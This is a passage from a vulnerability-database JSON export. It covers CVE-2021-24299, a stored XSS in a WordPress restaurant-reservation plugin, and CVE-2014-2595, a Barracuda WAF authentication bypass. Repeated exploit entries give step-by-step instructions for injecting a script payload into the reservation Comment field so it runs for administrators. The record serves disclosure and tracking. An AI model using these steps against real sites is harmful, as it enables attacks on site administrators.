form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-21] #"}, "lastseen": "2021-10-21T20:36:05", "differentElements": ["sourceData"], "edition": 49}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "1914ef99aaae9aa8f128cd694ff68eaa", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-22T08:27:56", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-10-22T08:27:56", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-10-22T08:27:56", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-22] #"}, "lastseen": "2021-10-22T08:27:56", "differentElements": ["sourceData"], "edition": 50}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-10-22T08:27:56", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-10-22T08:27:56", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-23] #", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.zdt.ZDTBulletin", "robots.models.base.Bulletin"]}], "cve": [{"id": "CVE-2021-24299", "bulletinFamily": "NVD", "title": "CVE-2021-24299", "description": "The ReDi Restaurant Reservation WordPress plugin before 21.0426 provides the functionality to let users make restaurant reservations. These reservations are stored and can be listed on an 'Upcoming' page provided by the plugin. An unauthenticated user can fill in the form to make a restaurant reservation. The form to make a restaurant reservation field called 'Comment' does not use proper input validation and can be used to store XSS payloads. The XSS payloads will be executed when the plugin user goes to the 'Upcoming' page, which is an external website https://upcoming.reservationdiary.eu/ loaded in an iframe, and the stored reservation with XSS payload is loaded.", "published": "2021-05-17T17:15:00", "modified": "2021-05-24T19:16:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24299", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/fd6ce00b-8c5f-4180-b648-f47b37303670", "http://packetstormsecurity.com/files/162756/WordPress-ReDi-Restaurant-Reservation-21.0307-Cross-Site-Scripting.html"], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "type": "cve", "lastseen": "2021-05-25T07:54:54", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-24299"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "The ReDi Restaurant Reservation WordPress plugin before 21.0426 provides the functionality to let users make restaurant reservations. These reservations are stored and can be listed on an 'Upcoming' page provided by the plugin. An unauthenticated user can fill in the form to make a restaurant reservation. The form to make a restaurant reservation field called 'Comment' does not use proper input validation and can be used to store XSS payloads. The XSS payloads will be executed when the plugin user goes to the 'Upcoming' page, which is an external website https://upcoming.reservationdiary.eu/ loaded in an iframe, and the stored reservation with XSS payload is loaded.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-05-18T01:52:43", "references": [{"idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"], "type": "wpvulndb"}, {"idList": ["EDB-ID:49903"], "type": "exploitdb"}, {"idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"], "type": "threatpost"}, {"idList": ["PACKETSTORM:162756"], "type": "packetstorm"}, {"idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"], "type": "wpexploit"}], "rev": 2}, "score": {"modified": "2021-05-18T01:52:43", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [{"name": "https://wpscan.com/vulnerability/fd6ce00b-8c5f-4180-b648-f47b37303670", "refsource": "CONFIRM", "tags": [], "url": "https://wpscan.com/vulnerability/fd6ce00b-8c5f-4180-b648-f47b37303670"}], "hash": "a2ca7bf4963660190a5dfd7e138fb1843e11d8cf561443b5c6f070cdc68b827b", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "e42d92edc76bc0cb9b19090fd6f24b92", "key": "modified"}, {"hash": "533af5b4ddce30663bd3b20867a0bc49", "key": "reporter"}, {"hash": "0225c838079b63e007489080143d9252", "key": "published"}, {"hash": "7d516d684a2ea31521a6767bc243fcbc", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e2f68b506b2617729f4450581920e9ff", "key": "references"}, {"hash": "2e57906506319534094a24b4fe77ea34", "key": "extraReferences"}, {"hash": "7793af1b65f46655508bdbce07e2e320", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "43f19d25637d2bbe4084390f53fdd98d", "key": "cvelist"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "8d8c803cbdc0492a7e8d7fbf3b29e02a", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24299", "id": "CVE-2021-24299", "immutableFields": [], "lastseen": "2021-05-18T01:52:43", "modified": "2021-05-17T17:30:00", "objectVersion": "1.5", "published": "2021-05-17T17:15:00", "references": ["https://wpscan.com/vulnerability/fd6ce00b-8c5f-4180-b648-f47b37303670"], "reporter": "contact@wpscan.com", "title": "CVE-2021-24299", "type": "cve", "viewCount": 7}, "different_elements": ["extraReferences", "cvss", "references", "cvss3", "cvss2", "modified", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-05-18T01:52:43"}], "edition": 2, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "6c5d7ba083ecabba6aba7d5a4776f066"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "f06a261fe04289ed0b33eb694d200598"}, {"key": "cvelist", "hash": "43f19d25637d2bbe4084390f53fdd98d"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "4419eb17de947d4d6b67ac07ed8d9064"}, {"key": "cvss3", "hash": "d79524472d90697b9a92d39c19491dce"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "7d516d684a2ea31521a6767bc243fcbc"}, {"key": "extraReferences", "hash": "799cb8fcb45caa33821a37b9f3c0322c"}, {"key": "href", "hash": "8d8c803cbdc0492a7e8d7fbf3b29e02a"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "de471f73bcf807734dd2536fecd279e1"}, {"key": "published", "hash": "0225c838079b63e007489080143d9252"}, {"key": "references", "hash": "0b85c4de08aa6ebb08f7650792e27cc0"}, {"key": "reporter", "hash": "533af5b4ddce30663bd3b20867a0bc49"}, {"key": "title", "hash": "7793af1b65f46655508bdbce07e2e320"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "652049ff9e76ed25c7a17956cb089f4c2b69118a92aba938b23063e6b784aeb0", "viewCount": 35, "enchantments": {"dependencies": {"references": [{"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}], "modified": "2021-05-25T07:54:54", "rev": 2}, "score": {"value": 1.2, "vector": "NONE", "modified": "2021-05-25T07:54:54", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "catzsoft:redi_restaurant_reservation", "name": "catzsoft redi restaurant reservation", "operator": "lt", "version": "21.0426"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:catzsoft:redi_restaurant_reservation:21.0426:*:*:*:*:wordpress:*:*", "cpe_name": [], "versionEndExcluding": "21.0426", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://wpscan.com/vulnerability/fd6ce00b-8c5f-4180-b648-f47b37303670", "refsource": "CONFIRM", "tags": ["Third Party Advisory", "Exploit"], "url": "https://wpscan.com/vulnerability/fd6ce00b-8c5f-4180-b648-f47b37303670"}, {"name": "http://packetstormsecurity.com/files/162756/WordPress-ReDi-Restaurant-Reservation-21.0307-Cross-Site-Scripting.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "http://packetstormsecurity.com/files/162756/WordPress-ReDi-Restaurant-Reservation-21.0307-Cross-Site-Scripting.html"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null}, {"bulletinFamily": "NVD", "hash": "6a0ace8cdb63863b470e6561269f441d83851201520bc6a55e7930a925c15e3a", "id": "CVE-2014-2595", "lastseen": "2021-04-22T23:44:08", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "cvelist": ["CVE-2014-2595"], "viewCount": 73, "modified": "2020-02-20T15:55:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "edition": 8, "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "history": [{"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-13T14:29:47", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-13T14:29:47", "value": 6.9, "vector": "NONE"}}, "hash": "0d148bb322c927927cf5c8adaba4daf0d811bf2bee4917f93ca62ca2f942333e", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "23075837e6c728c8f0077b2ae5d5ee7f", "key": "modified"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-13T14:29:47", "modified": "2020-02-12T13:07:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["cpe23", "cvss", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-13T14:29:47"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-02-12T14:27:29", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-12T14:27:29", "value": 6.9, "vector": "NONE"}}, "hash": "6ccf8f84237981876cda9914b348e4e11c8972875cdf630f59422732f1ea69ba", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-12T14:27:29", "modified": "2020-02-12T01:15:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["modified"], "edition": 2, "lastseen": "2020-02-12T14:27:29"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-10-03T12:01:15", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-10-03T12:01:15", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [], "hash": "65fabd8c3b92ccbba797b3dfba517234b9e0e8bc2464531f2cd64047dd457870", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-10-03T12:01:15", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 56}, "differentElements": ["extraReferences"], "edition": 6, "lastseen": "2020-10-03T12:01:15"}, {"bulletin": {"affectedSoftware": [{"name": "barracuda web_application_firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-02-21T13:06:26", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-02-21T13:06:26", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "4423bdd8d6936961112ee89e752cf7c866f443470052f4a4ac3529b4be6ae18f", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": 